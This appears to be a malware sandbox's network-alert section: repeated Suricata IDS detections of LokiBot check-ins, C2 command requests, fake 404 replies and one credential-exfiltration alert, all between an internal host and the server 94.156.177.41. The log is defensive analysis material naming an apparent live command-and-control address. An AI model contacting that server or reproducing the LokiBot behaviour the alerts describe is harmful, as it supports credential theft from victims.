                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49225
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49210
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49207
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49228
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49236
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49233
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49241
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49169 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49170 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49192
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49196
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49176
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49194
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49202
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49242 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49223 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49223 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49223 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49221 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49221 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49221 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49229
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49221 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49221 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49222
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49247 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49174
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49173
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49169 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49197
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49243 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49243 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49223 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49234 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49223 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49242 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49243 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49221
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49223
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49234 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49238 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49242 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49170
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49198
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49226 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49247
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49242 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49242 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49243 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49238 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49226 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49226 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49238 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49242
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49226 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49226 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49226
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49212
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49248 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49231
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49248 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49234 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49234 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49245
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49238 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49238 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49246 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49248 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49248 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49243 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49234
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49204
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49238
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49248 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49219 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49209
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49239
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49208
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49183
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49219 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49219 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49246
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49248
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49217 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49243
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49219 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49219 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49169 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49217 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49219
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49201
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49217 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49211
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49217 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49217 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49224 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49224 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49224 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49240 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49240 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49240 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49224 -> 94.156.177.41:80
